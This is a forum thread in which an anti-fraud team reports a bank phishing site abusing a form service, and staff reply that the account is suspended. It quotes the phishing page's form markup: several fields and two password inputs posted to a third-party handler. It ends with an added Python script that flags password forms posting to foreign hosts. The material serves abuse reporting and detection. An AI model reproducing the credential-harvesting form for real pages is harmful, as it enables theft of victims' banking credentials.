Fraudulent site - please shut down! [Standard Bank 12213] IP: 174.34.57.212

  • rsa security
    Asked on January 30, 2012 at 10:50 AM

    Dear Team,

    It appears the form service you provide is being used in a phishing attack.

    Please find the HTML/View-Source of the attack attached, in which the fraudster's use of your form service can be seen.

    Once the victim completes filling out and submitting personal details, your form service is used by the fraudster to send the compromised details to a remote server or email address.

    Form Information details:

    <form id=form664862 name=form14940 accept-charset=utf-8 action=http://submit.jotform.com/submit.php method=post enctype=multipart/form-data cc="true" sizcache="10" sizset="0">
    <form class=jotform-form id=20282651337 accept-charset="utf-8" name="form_20282651337" method="post" action="http://submit.jotform.com/submit.php">
    <input type=hidden value=20282651337 name=formid>
    <input class=form-textbox id=input_1 name=q1_11 _prototypeuid="3">
    <input class=form-textbox id=input_3 type=password value="" name=q3_2 _prototypeuid="5">
    <input class=form-textbox id=input_4 type=password value="" name=q4_3 _prototypeuid="7">
    <input class=form-textbox id=input_5 name=q5_4 _prototypeuid="9">
    <input class=form-textbox id=input_6 name=q6_5 _prototypeuid="11">
    <input class=form-textbox id=input_7 name=q7_6 _prototypeuid="13">
    <input class=form-textbox id=input_8 name=q8_7 _prototypeuid="15">

    Please take the necessary steps in order to disable this fraudulent activity.

    Best Regards,

    RSA Anti-Fraud Command Center
    RSA, The Security Division of EMC
    US Phone: +1-866-408-7525
    Email: afcc@rsa.com

    For more information about RSA's AFCC
    http://www.rsa.com/node.aspx?id=3348

    15
  • aytekin
    Answered on January 30, 2012 at 11:13 AM

    Thank you for letting us know. We have now suspended the account.
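
The pattern reported above, a page that collects password fields and posts them to a third-party form handler, can be checked for mechanically when triaging a suspect page. The following is an added example, not part of the original thread or the form service's own tooling; the page host `bank-login.example` and the function and class names are assumptions, and the sample markup is constructed from the form lines quoted in the report.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: adapted from the form lines quoted in the report, closing tags added.
SAMPLE = """
<form class=jotform-form id=20282651337 accept-charset="utf-8" name="form_20282651337" method="post" action="http://submit.jotform.com/submit.php">
<input type=hidden value=20282651337 name=formid>
<input class=form-textbox id=input_1 name=q1_11>
<input class=form-textbox id=input_3 type=password value="" name=q3_2>
<input class=form-textbox id=input_4 type=password value="" name=q4_3>
</form>
<form action="/search" method="get"><input name=q></form>
"""

class FormAudit(HTMLParser):
    """Collect each form's action URL, formid value and password-field count."""
    def __init__(self):
        super().__init__()
        self.forms = []
        self._cur = None
    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._cur = {"action": a.get("action") or "", "formid": None, "passwords": 0}
            self.forms.append(self._cur)
        elif tag == "input" and self._cur is not None:
            if (a.get("type") or "").lower() == "password":
                self._cur["passwords"] += 1
            if a.get("name") == "formid":
                self._cur["formid"] = a.get("value")
    def handle_endtag(self, tag):
        if tag == "form":
            self._cur = None

def suspicious_forms(html, page_host):
    """Return forms that collect passwords and post to a host other than page_host."""
    parser = FormAudit()
    parser.feed(html)
    out = []
    for f in parser.forms:
        # A relative action has no hostname, so it posts back to the page's own host.
        host = (urlparse(f["action"]).hostname or page_host).lower()
        if f["passwords"] and host != page_host.lower():
            out.append({**f, "host": host})
    return out

if __name__ == "__main__":
    for hit in suspicious_forms(SAMPLE, "bank-login.example"):  # hypothetical page host
        print(hit)
```

The `formid` value in each hit is the identifier an abuse desk needs to locate and suspend the form.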